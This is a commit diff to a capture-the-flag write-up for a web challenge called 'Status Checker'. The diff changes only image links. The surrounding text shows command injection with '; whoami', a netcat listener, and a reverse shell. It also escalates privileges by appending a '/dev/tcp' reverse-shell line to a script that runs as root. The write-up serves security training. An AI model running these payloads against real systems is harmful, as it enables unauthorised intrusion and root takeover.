kqjy/GiTxHextech-Challenge-Repo
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update writeup.md

Browse Source
This commit is contained in:
Twi
2024-04-18 15:32:12 +08:00
committed by GitHub
parent a0a1f11bac
commit fd4db174a3
1 changed files with 6 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
challenges/web/Status Checker/writeup.md
View File

@@ -6,11 +6,11 @@ Entering a valid URL such as ``https://google.com`` will return us the HTTP stat
Entering a semi-colon (;) will break the command. We can try to use the payload ``; whoami`` and we are returned ``www-data`` as our user as seen in the following screenshot. Entering a semi-colon (;) will break the command. We can try to use the payload ``; whoami`` and we are returned ``www-data`` as our user as seen in the following screenshot.
![[wimg-2]] ![wimg-2](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-2.png)
We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be ``nc -nlvp 45101`` as seen in the following screenshot. We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be ``nc -nlvp 45101`` as seen in the following screenshot.
![[wimg-3]] ![wimg-3](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-3.png)
Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address. Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address.
@@ -20,11 +20,11 @@ Once its listening on the port, we can use the following payload to spawn the re
Input the above payload into the input box as seen in the following screenshot. Input the above payload into the input box as seen in the following screenshot.
![[wimg-4]] ![wimg-4](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-4.png)
Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot. Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot.
![[wimg-5]] ![wimg-5](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-5.png)
We can spawn an interactive shell using the command ``script -qc /bin/bash /dev/null``. Once done, we can explore the system. Navigating to the ``/var/www/`` directory and we can see 2 files. We can spawn an interactive shell using the command ``script -qc /bin/bash /dev/null``. Once done, we can explore the system. Navigating to the ``/var/www/`` directory and we can see 2 files.
@@ -32,7 +32,7 @@ The files are:
- backup.sh - Owned by the root user. - backup.sh - Owned by the root user.
- my-script.sh - Owned by the www-data user. - my-script.sh - Owned by the www-data user.
![[wimg-6]] ![wimg-6](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-6.png)
We can see that the ``backup.sh`` file runs the ``my-script.sh`` file as sudo, effectively running as the root user. We can see that the ``backup.sh`` file runs the ``my-script.sh`` file as sudo, effectively running as the root user.
@@ -47,6 +47,6 @@ echo 'bash -i >& /dev/tcp/YOUR-IP-HERE/PORT-HERE 0>&1' >> my-script.sh
Replace ``YOUR-IP-HERE`` with your IP address and ``PORT-HERE`` with your desired port number. Once done, start another netcat listener on the port that was chosen in the above command. In this example, it will be 45102 as seen in the following screenshot. Replace ``YOUR-IP-HERE`` with your IP address and ``PORT-HERE`` with your desired port number. Once done, start another netcat listener on the port that was chosen in the above command. In this example, it will be 45102 as seen in the following screenshot.
![[wimg-7]] ![wimg-7](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-7.png)